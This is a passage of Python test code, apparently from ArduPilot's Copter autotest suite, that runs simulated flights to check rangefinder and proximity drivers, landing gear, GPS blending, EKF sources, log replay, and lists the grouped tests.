self.wait_mode('ALT_HOLD')
self.change_mode('AUTO')
self.wait_rtl_complete()
def fly_rangefinder_drivers_fly(self, rangefinders):
'''ensure rangefinder gives height-above-ground'''
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0)
)
for i in range(0, len(rangefinders)):
name = rangefinders[i]
self.progress("i=%u (%s)" % (i, name))
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message for id==%u (%s)" % (i, name))
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"distance sensor.current_distance (%f) (%s) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, name, gpi.relative_alt/1000.0))
self.land_and_disarm()
self.progress("Ensure RFND messages in log")
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("No RFND messages in log")
def fly_proximity_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink proximity sensor using DISTANCE_SENSOR messages") # noqa
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("PRX_TYPE", 2) # mavlink
self.reboot_sitl()
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
50, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
# now make sure we get echoed back the same sorts of things we send:
# distances are in cm
distance_map = {
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE: 30,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_45: 35,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_90: 20,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_135: 15,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_180: 70,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_225: 80,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_270: 10,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_315: 90,
}
wanted_distances = copy.copy(distance_map)
sensor_enum = mavutil.mavlink.enums["MAV_SENSOR_ORIENTATION"]
def my_message_hook(mav, m):
if m.get_type() != 'DISTANCE_SENSOR':
return
self.progress("Got (%s)" % str(m))
want = distance_map[m.orientation]
got = m.current_distance
# ArduPilot's floating point conversions make it imprecise:
delta = abs(want-got)
if delta > 1:
self.progress(
"Wrong distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
return
if m.orientation not in wanted_distances:
return
self.progress(
"Correct distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
del wanted_distances[m.orientation]
self.install_message_hook_context(my_message_hook)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not give right distances") # noqa
for (orient, dist) in distance_map.items():
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
90, # max_distance cm
dist, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
orient, # orientation
255 # covariance
)
self.wait_heartbeat()
if len(wanted_distances.keys()) == 0:
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink rangefinder using DISTANCE_SENSOR messages")
self.context_push()
self.set_parameter('RTL_ALT_TYPE', 0)
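        # RTL_ALT_TYPE 0: RTL altitude is relative to home rather than
        # terrain (terrain-relative RTL would consult the rangefinder we
        # are about to fake)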
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.reboot_sitl()
self.set_parameter("RNGFND1_MAX_CM", 32767)
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance
50, # max_distance
20, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Landing gear should deploy with current_distance below min_distance")
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_parameter("SERVO10_FUNCTION", 29)
self.set_parameter("LGR_DEPLOY_ALT", 1)
self.set_parameter("LGR_RETRACT_ALT", 10) # metres
            self.delay_sim_time(1)  # servo function map is only periodically updated
# self.send_debug_trap()
self.run_cmd(
mavutil.mavlink.MAV_CMD_AIRFRAME_CONFIGURATION,
0,
0, # deploy
0,
0,
0,
0,
0
)
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
2500, # max_distance (cm)
200, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.context_collect("STATUSTEXT")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Retraction did not happen")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
6000, # max_distance (cm)
1500, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.delay_sim_time(0.1)
try:
self.wait_text("LandingGear: RETRACT", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Retracted")
break
# self.send_debug_trap()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Deployment did not happen")
self.progress("Sending distance-sensor message")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
300, # min_distance
500, # max_distance
250, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
try:
self.wait_text("LandingGear: DEPLOY", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Deployed")
break
self.disarm_vehicle()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_gsf(self):
'''test the Gaussian Sum filter'''
ex = None
self.context_push()
try:
self.set_parameter("EK2_ENABLE", 1)
self.reboot_sitl()
self.takeoff(20, mode='LOITER')
self.set_rc(2, 1400)
self.delay_sim_time(5)
self.set_rc(2, 1500)
self.progress("Path: %s" % self.current_onboard_log_filepath())
dfreader = self.dfreader_for_current_onboard_log()
self.do_RTL()
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# ensure log messages present
want = set(["XKY0", "XKY1", "NKY0", "NKY1"])
        still_want = want  # deliberately the same set: removing found types also narrows the recv_match type filter
while len(still_want):
m = dfreader.recv_match(type=want)
if m is None:
raise NotAchievedException("Did not get %s" % want)
still_want.remove(m.get_type())
def fly_rangefinder_mavlink(self):
self.fly_rangefinder_mavlink_distance_sensor()
# explicit test for the mavlink driver as it doesn't play so nice:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.customise_SITL_commandline(['--uartF=sim:rf_mavlink'])
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Mavlink rangefinder not working")
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
print("rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0))
continue
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message")
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
print(
"distance sensor.current_distance (%f) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, gpi.relative_alt/1000.0))
continue
break
self.progress("mavlink rangefinder OK")
self.land_and_disarm()
def fly_rangefinder_driver_maxbotix(self):
ex = None
try:
self.context_push()
self.start_subtest("No messages")
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
if rf is not None:
raise NotAchievedException("Receiving DISTANCE_SENSOR when I shouldn't be")
self.start_subtest("Default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to non-default address")
self.set_parameter("RNGFND1_ADDR", 0x71)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Two MaxBotix RangeFinders")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.set_parameter("RNGFND1_MIN_CM", 150)
self.set_parameter("RNGFND2_TYPE", 2) # maxbotix
self.set_parameter("RNGFND2_ADDR", 0x71)
self.set_parameter("RNGFND2_MIN_CM", 250)
self.reboot_sitl()
self.do_timesync_roundtrip()
for i in [0, 1]:
rf = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=5,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
self.progress("Got id==%u (%s)" % (i, str(rf)))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
expected_dist = 150
if i == 1:
expected_dist = 250
if rf.min_distance != expected_dist:
raise NotAchievedException("Unexpected min_cm (want=%u got=%u)" %
(expected_dist, rf.min_distance))
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_drivers(self):
self.set_parameter("RTL_ALT", 500)
self.set_parameter("RTL_ALT_TYPE", 1)
drivers = [
("lightwareserial", 8), # autodetected between this and -binary
("lightwareserial-binary", 8),
("ulanding_v0", 11),
("ulanding_v1", 11),
("leddarone", 12),
("maxsonarseriallv", 13),
("nmea", 17),
("wasp", 18),
("benewake_tf02", 19),
("blping", 23),
("benewake_tfmini", 20),
("lanbao", 26),
("benewake_tf03", 27),
("gyus42v2", 31),
]
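        # SITL offers three spare serial ports (uartE/F/G), so exercise the
        # serial drivers in batches of three, restarting SITL for each batch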
while len(drivers):
do_drivers = drivers[0:3]
drivers = drivers[3:]
command_line_args = []
for (offs, cmdline_argument, serial_num) in [(0, '--uartE', 4),
(1, '--uartF', 5),
(2, '--uartG', 6)]:
if len(do_drivers) > offs:
(sim_name, rngfnd_param_value) = do_drivers[offs]
command_line_args.append("%s=sim:%s" %
(cmdline_argument, sim_name))
serial_param_name = "SERIAL%u_PROTOCOL" % serial_num
self.set_parameter(serial_param_name, 9) # rangefinder
self.set_parameter("RNGFND%u_TYPE" % (offs+1), rngfnd_param_value)
self.customise_SITL_commandline(command_line_args)
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
self.fly_rangefinder_mavlink()
i2c_drivers = [
("maxbotixi2cxl", 2),
]
while len(i2c_drivers):
do_drivers = i2c_drivers[0:9]
i2c_drivers = i2c_drivers[9:]
count = 1
for d in do_drivers:
(sim_name, rngfnd_param_value) = d
self.set_parameter("RNGFND%u_TYPE" % count, rngfnd_param_value)
count += 1
self.reboot_sitl()
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
def fly_ship_takeoff(self):
# test ship takeoff
self.wait_groundspeed(0, 2)
self.set_parameter("SIM_SHIP_ENABLE", 1)
self.set_parameter("SIM_SHIP_SPEED", 10)
self.set_parameter("SIM_SHIP_DSIZE", 2)
self.wait_ready_to_arm()
# we should be moving with the ship
self.wait_groundspeed(9, 11)
self.takeoff(10)
# above ship our speed drops to 0
self.wait_groundspeed(0, 2)
self.land_and_disarm()
# ship will have moved on, so we land on the water which isn't moving
self.wait_groundspeed(0, 2)
def test_parameter_validation(self):
# wait 10 seconds for initialisation
self.delay_sim_time(10)
self.progress("invalid; min must be less than max:")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 50)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; min must be less than max (equal case):")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (min=0)")
self.set_parameter("MOT_PWM_MIN", 0)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (max=0)")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 0)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
def test_alt_estimate_prearm(self):
self.context_push()
ex = None
try:
# disable barometer so there is no altitude source
self.set_parameter("SIM_BARO_DISABLE", 1)
self.set_parameter("SIM_BARO2_DISABL", 1)
self.wait_gps_disable(position_vertical=True)
# turn off arming checks (mandatory arming checks will still be run)
self.set_parameter("ARMING_CHECK", 0)
# delay 12 sec to allow EKF to lose altitude estimate
self.delay_sim_time(12)
self.change_mode("ALT_HOLD")
self.assert_prearm_failure("Need Alt Estimate")
# force arm vehicle in stabilize to bypass barometer pre-arm checks
self.change_mode("STABILIZE")
self.arm_vehicle()
self.set_rc(3, 1700)
try:
self.change_mode("ALT_HOLD", timeout=10)
except AutoTestTimeoutException:
self.progress("PASS not able to set mode without Position : %s" % "ALT_HOLD")
# check that mode change to ALT_HOLD has failed (it should)
if self.mode_is("ALT_HOLD"):
raise NotAchievedException("Changed to ALT_HOLD with no altitude estimate")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def test_ekf_source(self):
self.context_push()
ex = None
try:
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.wait_ready_to_arm()
self.start_subtest("bad yaw source")
self.set_parameter("EK3_SRC3_YAW", 17)
self.assert_prearm_failure("Check EK3_SRC3_YAW")
self.context_push()
self.start_subtest("missing required yaw source")
self.set_parameter("EK3_SRC3_YAW", 3) # External Yaw with Compass Fallback
self.set_parameter("COMPASS_USE", 0)
self.set_parameter("COMPASS_USE2", 0)
self.set_parameter("COMPASS_USE3", 0)
self.assert_prearm_failure("EK3 sources require Compass")
self.context_pop()
except Exception as e:
self.disarm_vehicle(force=True)
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_replay_gps_bit(self):
self.set_parameters({
"LOG_REPLAY": 1,
"LOG_DISARMED": 1,
"EK3_ENABLE": 1,
"EK2_ENABLE": 1,
"AHRS_TRIM_X": 0.01,
"AHRS_TRIM_Y": -0.03,
"GPS_TYPE2": 1,
"GPS_POS1_X": 0.1,
"GPS_POS1_Y": 0.2,
"GPS_POS1_Z": 0.3,
"GPS_POS2_X": -0.1,
"GPS_POS2_Y": -0.02,
"GPS_POS2_Z": -0.31,
"INS_POS1_X": 0.12,
"INS_POS1_Y": 0.14,
"INS_POS1_Z": -0.02,
"INS_POS2_X": 0.07,
"INS_POS2_Y": 0.012,
"INS_POS2_Z": -0.06,
"RNGFND1_TYPE": 1,
"RNGFND1_PIN": 0,
"RNGFND1_SCALING": 30,
"RNGFND1_POS_X": 0.17,
"RNGFND1_POS_Y": -0.07,
"RNGFND1_POS_Z": -0.005,
"SIM_SONAR_SCALE": 30,
"SIM_GPS2_DISABLE": 0,
})
self.reboot_sitl()
current_log_filepath = self.current_onboard_log_filepath()
self.progress("Current log path: %s" % str(current_log_filepath))
self.change_mode("LOITER")
self.wait_ready_to_arm(require_absolute=True)
self.arm_vehicle()
self.takeoffAndMoveAway()
self.do_RTL()
self.reboot_sitl()
return current_log_filepath
def test_replay_beacon_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_beacon_position()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
return log_difference[2]
def test_replay_optical_flow_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_optical_flow_limits()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
print("log difference: %s" % str(log_difference))
return log_difference[0]
def test_gps_blending(self):
'''ensure we get dataflash log messages for blended instance'''
self.context_push()
ex = None
try:
# configure:
self.set_parameter("GPS_TYPE2", 1)
self.set_parameter("SIM_GPS2_TYPE", 1)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.set_parameter("GPS_AUTO_SWITCH", 2)
self.reboot_sitl()
# ensure we're seeing the second GPS:
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 60:
raise NotAchievedException("Did not get good GPS2_RAW message")
m = self.mav.recv_match(type='GPS2_RAW', blocking=True, timeout=1)
self.progress("%s" % str(m))
if m is None:
continue
if m.lat == 0:
continue
break
# create a log we can expect blended data to appear in:
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(5)
self.disarm_vehicle()
# inspect generated log for messages:
dfreader = self.dfreader_for_current_onboard_log()
wanted = set([0, 1, 2])
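            # instances 0 and 1 are the two physical receivers; instance 2
            # is the blended solution this test is looking for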
while True:
m = dfreader.recv_match(type="GPS") # disarmed
if m is None:
break
try:
wanted.remove(m.I)
except KeyError:
continue
if len(wanted) == 0:
break
if len(wanted):
raise NotAchievedException("Did not get all three GPS types")
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_callisto(self):
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto')), ],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def fly_each_frame(self):
vinfo = vehicleinfo.VehicleInfo()
copter_vinfo_options = vinfo.options[self.vehicleinfo_key()]
known_broken_frames = {
'cwx': "missing defaults file",
'deca-cwx': 'missing defaults file',
'djix': "missing defaults file",
'heli-compound': "wrong binary, different takeoff regime",
'heli-dual': "wrong binary, different takeoff regime",
'heli': "wrong binary, different takeoff regime",
'hexa-cwx': "does not take off",
'hexa-dji': "does not take off",
'octa-quad-cwx': "does not take off",
'tri': "does not take off",
}
for frame in sorted(copter_vinfo_options["frames"].keys()):
self.start_subtest("Testing frame (%s)" % str(frame))
if frame in known_broken_frames:
self.progress("Actually, no I'm not - it is known-broken (%s)" %
(known_broken_frames[frame]))
continue
frame_bits = copter_vinfo_options["frames"][frame]
print("frame_bits: %s" % str(frame_bits))
if frame_bits.get("external", False):
self.progress("Actually, no I'm not - it is an external simulation")
continue
model = frame_bits.get("model", frame)
# the model string for Callisto has crap in it.... we
# should really have another entry in the vehicleinfo data
# to carry the path to the JSON.
actual_model = model.split(":")[0]
defaults = self.model_defaults_filepath("ArduCopter", actual_model)
if type(defaults) != list:
defaults = [defaults]
self.customise_SITL_commandline(
["--defaults", ','.join(defaults), ],
model=model,
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def test_replay(self):
'''test replay correctness'''
self.progress("Building Replay")
util.build_SITL('tools/Replay', clean=False, configure=False)
self.test_replay_bit(self.test_replay_gps_bit)
self.test_replay_bit(self.test_replay_beacon_bit)
self.test_replay_bit(self.test_replay_optical_flow_bit)
def test_replay_bit(self, bit):
self.context_push()
current_log_filepath = bit()
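        # Replay re-runs the estimators over the onboard log; check_replay.py
        # then verifies the replayed solution is consistent with what was logged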
self.progress("Running replay on (%s)" % current_log_filepath)
util.run_cmd(['build/sitl/tools/Replay', current_log_filepath],
directory=util.topdir(), checkfail=True, show=True)
self.context_pop()
replay_log_filepath = self.current_onboard_log_filepath()
self.progress("Replay log path: %s" % str(replay_log_filepath))
check_replay = util.load_local_module("Tools/Replay/check_replay.py")
ok = check_replay.check_log(replay_log_filepath, self.progress, verbose=True)
if not ok:
raise NotAchievedException("check_replay failed")
def test_copter_gps_zero(self):
# https://github.com/ArduPilot/ardupilot/issues/14236
self.progress("arm the vehicle and takeoff in Guided")
self.takeoff(20, mode='GUIDED')
self.progress("fly 50m North (or whatever)")
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
self.fly_guided_move_global_relative_alt(50, 0, 20)
self.set_parameter('GPS_TYPE', 0)
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 30 and self.mode_is('LAND'):
self.progress("Bug not reproduced")
break
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("Received (%s)" % str(m))
if m is None:
raise NotAchievedException("No GLOBAL_POSITION_INT?!")
pos_delta = self.get_distance_int(old_pos, m)
self.progress("Distance: %f" % pos_delta)
if pos_delta < 5:
raise NotAchievedException("Bug reproduced - returned to near origin")
self.wait_disarmed()
self.reboot_sitl()
# a wrapper around all the 1A,1B,1C..etc tests for travis
def tests1(self):
ret = ([])
ret.extend(self.tests1a())
ret.extend(self.tests1b())
ret.extend(self.tests1c())
ret.extend(self.tests1d())
ret.extend(self.tests1e())
return ret
def tests1a(self):
'''return list of all tests'''
ret = super(AutoTestCopter, self).tests() # about 5 mins and ~20 initial tests from autotest/common.py
ret.extend([
("NavDelayTakeoffAbsTime",
"Fly Nav Delay (takeoff)",
self.fly_nav_takeoff_delay_abstime), # 19s
("NavDelayAbsTime",
"Fly Nav Delay (AbsTime)",
self.fly_nav_delay_abstime), # 20s
("NavDelay",
"Fly Nav Delay",
self.fly_nav_delay), # 19s
("GuidedSubModeChange",
"Test submode change",
self.fly_guided_change_submode),
("LoiterToAlt",
"Loiter-To-Alt",
self.fly_loiter_to_alt), # 25s
("PayLoadPlaceMission",
"Payload Place Mission",
self.fly_payload_place_mission), # 44s
("PrecisionLoiterCompanion",
"Precision Loiter (Companion)",
self.fly_precision_companion), # 29s
("PrecisionLandingSITL",
"Precision Landing (SITL)",
self.fly_precision_sitl), # 29s
("SetModesViaModeSwitch",
"Set modes via modeswitch",
self.test_setting_modes_via_modeswitch),
("SetModesViaAuxSwitch",
"Set modes via auxswitch",
self.test_setting_modes_via_auxswitch),
("AuxSwitchOptions",
"Test random aux mode options",
self.test_aux_switch_options),
("AuxFunctionsInMission",
"Test use of auxilliary functions in missions",
self.test_aux_functions_in_mission),
("AutoTune",
"Fly AUTOTUNE mode",
self.fly_autotune), # 73s
])
return ret
def tests1b(self):
'''return list of all tests'''
ret = ([
("ThrowMode", "Fly Throw Mode", self.fly_throw_mode),
("BrakeMode", "Fly Brake Mode", self.fly_brake_mode),
("RecordThenPlayMission",
"Use switches to toggle in mission, then fly it",
self.fly_square), # 27s
("ThrottleFailsafe",
"Test Throttle Failsafe",
self.fly_throttle_failsafe), # 173s
("GCSFailsafe",
"Test GCS Failsafe",
self.fly_gcs_failsafe), # 239s
# this group has the smallest runtime right now at around
            # 5mins, so add more tests here, till it's around
# 9-10mins, then make a new group
])
return ret
def tests1c(self):
'''return list of all tests'''
ret = ([
("BatteryFailsafe",
"Fly Battery Failsafe",
self.fly_battery_failsafe), # 164s
("StabilityPatch",
"Fly stability patch",
lambda: self.fly_stability_patch(30)), # 17s
("OBSTACLE_DISTANCE_3D",
"Test proximity avoidance slide behaviour in 3D",
self.OBSTACLE_DISTANCE_3D), # ??s
("AC_Avoidance_Proximity",
"Test proximity avoidance slide behaviour",
self.fly_proximity_avoidance_test), # 41s
("AC_Avoidance_Fence",
"Test fence avoidance slide behaviour",
self.fly_fence_avoidance_test),
("AC_Avoidance_Beacon",
"Test beacon avoidance slide behaviour",
self.fly_beacon_avoidance_test), # 28s
("BaroWindCorrection",
"Test wind estimation and baro position error compensation",
self.fly_wind_baro_compensation),
("SetpointGlobalPos",
"Test setpoint global position",
self.test_set_position_global_int),
("SetpointGlobalVel",
"Test setpoint global velocity",
self.test_set_velocity_global_int),
("SplineTerrain",
"Test Splines and Terrain",
self.test_terrain_spline_mission),
])
return ret
def tests1d(self):
'''return list of all tests'''
ret = ([
("HorizontalFence",
"Test horizontal fence",
self.fly_fence_test), # 20s
("HorizontalAvoidFence",
"Test horizontal Avoidance fence",
self.fly_fence_avoid_test),
("MaxAltFence",
"Test Max Alt Fence",
self.fly_alt_max_fence_test), # 26s
("MinAltFence",
"Test Min Alt Fence",
self.fly_alt_min_fence_test), # 26s
("FenceFloorEnabledLanding",
"Test Landing with Fence floor enabled",
self.fly_fence_floor_enabled_landing),
("AutoTuneSwitch",
"Fly AUTOTUNE on a switch",
self.fly_autotune_switch), # 105s
("GPSGlitchLoiter",
"GPS Glitch Loiter Test",
self.fly_gps_glitch_loiter_test), # 30s
("GPSGlitchAuto",
"GPS Glitch Auto Test",
self.fly_gps_glitch_auto_test),
("ModeAltHold",
"Test AltHold Mode",
self.test_mode_ALT_HOLD),
("ModeLoiter",
"Test Loiter Mode",
self.loiter),
("SimpleMode",
"Fly in SIMPLE mode",
self.fly_simple),
("SuperSimpleCircle",
"Fly a circle in SUPER SIMPLE mode",
self.fly_super_simple), # 38s
("ModeCircle",
"Fly CIRCLE mode",
self.fly_circle), # 27s
("MagFail",
"Test magnetometer failure",
self.test_mag_fail),
("OpticalFlowLimits",
"Fly Optical Flow limits",
self.fly_optical_flow_limits), # 27s
("MotorFail",
"Fly motor failure test",
self.fly_motor_fail),
("Flip",
"Fly Flip Mode",
self.fly_flip),
("CopterMission",
"Fly copter mission",
self.fly_auto_test), # 37s
("SplineLastWaypoint",
"Test Spline as last waypoint",
self.test_spline_last_waypoint),
("Gripper",
"Test gripper",
self.test_gripper), # 28s
("TestGripperMission",
"Test Gripper mission items",
self.test_gripper_mission),
("VisionPosition",
"Fly Vision Position",
self.fly_vision_position), # 24s
("GPSViconSwitching",
"Fly GPS and Vicon Switching",
self.fly_gps_vicon_switching),
])
return ret
def tests1e(self):
'''return list of all tests'''
ret = ([
("BeaconPosition",
"Fly Beacon Position",
self.fly_beacon_position), # 56s
("RTLSpeed",
"Fly RTL Speed",
self.fly_rtl_speed),
("Mount",
"Test Camera/Antenna Mount",
self.test_mount), # 74s
("Button",
"Test Buttons",
self.test_button),
("ShipTakeoff",
"Fly Simulated Ship Takeoff",
self.fly_ship_takeoff),
("RangeFinder",
